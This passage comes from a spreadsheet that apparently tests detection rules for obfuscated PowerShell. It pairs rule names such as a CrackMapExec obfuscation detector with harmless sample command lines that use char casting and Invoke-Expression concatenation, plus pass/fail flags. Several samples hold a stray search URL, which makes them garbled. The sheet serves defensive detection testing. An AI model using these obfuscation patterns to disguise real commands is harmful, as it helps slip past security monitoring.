      <c r="J1247" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1247" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1248" ht="15.75" customHeight="1" s="42">
      <c r="A1248" s="43" t="n"/>
      <c r="B1248" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1248" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1248" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1248" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1248" s="43" t="n"/>
      <c r="J1248" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1248" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1249" ht="15.75" customHeight="1" s="42">
      <c r="A1249" s="43" t="n"/>
      <c r="B1249" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1249" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1249" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1249" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1249" s="43" t="n"/>
      <c r="J1249" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1249" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1250" ht="15.75" customHeight="1" s="42">
      <c r="A1250" s="43" t="n"/>
      <c r="B1250" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1250" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1250" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1250" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1250" s="43" t="n"/>
      <c r="J1250" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1250" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1251" ht="15.75" customHeight="1" s="42">
      <c r="A1251" s="43" t="n"/>
      <c r="B1251" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1251" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1251" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1251" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1251" s="43" t="n"/>
      <c r="J1251" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1251" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1252" ht="15.75" customHeight="1" s="42">
      <c r="A1252" s="43" t="n"/>
      <c r="B1252" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1252" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1252" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1252" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1252" s="43" t="n"/>
      <c r="J1252" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1252" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1253" ht="15.75" customHeight="1" s="42">
      <c r="A1253" s="43" t="n"/>
      <c r="B1253" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1253" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1253" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1253" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1253" s="43" t="n"/>
      <c r="J1253" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1253" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1254" ht="15.75" customHeight="1" s="42">
      <c r="A1254" s="43" t="n"/>
      <c r="B1254" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1254" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1254" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1254" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAND "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1254" s="43" t="n"/>
      <c r="J1254" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1254" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1255" ht="15.75" customHeight="1" s="42">
      <c r="A1255" s="43" t="n"/>
      <c r="B1255" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1255" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1255" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1255" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1255" s="43" t="n"/>
      <c r="J1255" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1255" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1256" ht="15.75" customHeight="1" s="42">
      <c r="A1256" s="43" t="n"/>
      <c r="B1256" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1256" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1256" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1256" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMand "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1256" s="43" t="n"/>
      <c r="J1256" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1256" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1257" ht="15.75" customHeight="1" s="42">
      <c r="A1257" s="43" t="n"/>
      <c r="B1257" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1257" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1257" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1257" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1257" s="43" t="n"/>
      <c r="J1257" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1257" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1258" ht="15.75" customHeight="1" s="42">
      <c r="A1258" s="43" t="n"/>
      <c r="B1258" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1258" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1258" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1258" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1258" s="43" t="n"/>
      <c r="J1258" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1258" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1259" ht="15.75" customHeight="1" s="42">
      <c r="A1259" s="43" t="n"/>
      <c r="B1259" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1259" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1259" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1259" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1259" s="43" t="n"/>
      <c r="J1259" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1259" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1260" ht="15.75" customHeight="1" s="42">
      <c r="A1260" s="43" t="n"/>
      <c r="B1260" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1260" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1260" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1260" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1260" s="43" t="n"/>
      <c r="J1260" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1260" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1261" ht="15.75" customHeight="1" s="42">
      <c r="A1261" s="43" t="n"/>
      <c r="B1261" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1261" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1261" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1261" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1261" s="43" t="n"/>
      <c r="J1261" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1261" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1262" ht="15.75" customHeight="1" s="42">
      <c r="A1262" s="43" t="n"/>
      <c r="B1262" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1262" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1262" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1262" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1262" s="43" t="n"/>
      <c r="J1262" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1262" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1263" ht="15.75" customHeight="1" s="42">
      <c r="A1263" s="43" t="n"/>
      <c r="B1263" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1263" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1263" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1263" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1263" s="43" t="n"/>
      <c r="J1263" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1263" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1264" ht="15.75" customHeight="1" s="42">
      <c r="A1264" s="43" t="n"/>
      <c r="B1264" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1264" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1264" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1264" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1264" s="43" t="n"/>
      <c r="J1264" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1264" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1265" ht="15.75" customHeight="1" s="42">
      <c r="A1265" s="43" t="n"/>
      <c r="B1265" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1265" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1265" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1265" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1265" s="43" t="n"/>
      <c r="J1265" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1265" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1266" ht="15.75" customHeight="1" s="42">
      <c r="A1266" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1266" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1266" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1266" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1266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66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1266" s="43" t="n"/>
      <c r="J1266" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1266" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1267" ht="15.75" customHeight="1" s="42">
      <c r="A1267" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1267" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1267" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1267" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1267" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F1267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1267" s="43" t="n"/>
      <c r="J1267" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1267" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1268" ht="15.75" customHeight="1" s="42">
      <c r="A1268" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1268" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1268" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1268" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1268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68" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1268" s="43" t="n"/>
      <c r="J1268" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1268" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1269" ht="15.75" customHeight="1" s="42">
      <c r="A1269" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1269" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1269" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1269" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1269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69" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1269" s="43" t="n"/>
      <c r="J1269" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1269" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1270" ht="15.75" customHeight="1" s="42">
      <c r="A1270" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1270" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1270" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1270" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1270" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1270" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1270" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1270" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1271" ht="15.75" customHeight="1" s="42">
      <c r="A1271" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1271" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1271" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1271" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1271" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1271" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1271" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1271" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1271" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1272" ht="15.75" customHeight="1" s="42">
      <c r="A1272" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1272" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1272" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1272" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1272" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1272" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1272" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1272" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1272" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1273" ht="15.75" customHeight="1" s="42">
      <c r="A1273" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B1273" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1273" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1273" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1273" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1273" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1273" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1273" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1273" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1274" ht="15.75" customHeight="1" s="42">
      <c r="A1274" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1274" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1274" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1274" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1274" s="4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74" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1274" s="4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274" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1274" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1275" ht="15.75" customHeight="1" s="42">
      <c r="A1275" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1275" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1275" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1275" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1275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75" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1275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275" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1275" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1276" ht="15.75" customHeight="1" s="42">
      <c r="A1276" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B1276" s="44" t="inlineStr">
        <is>
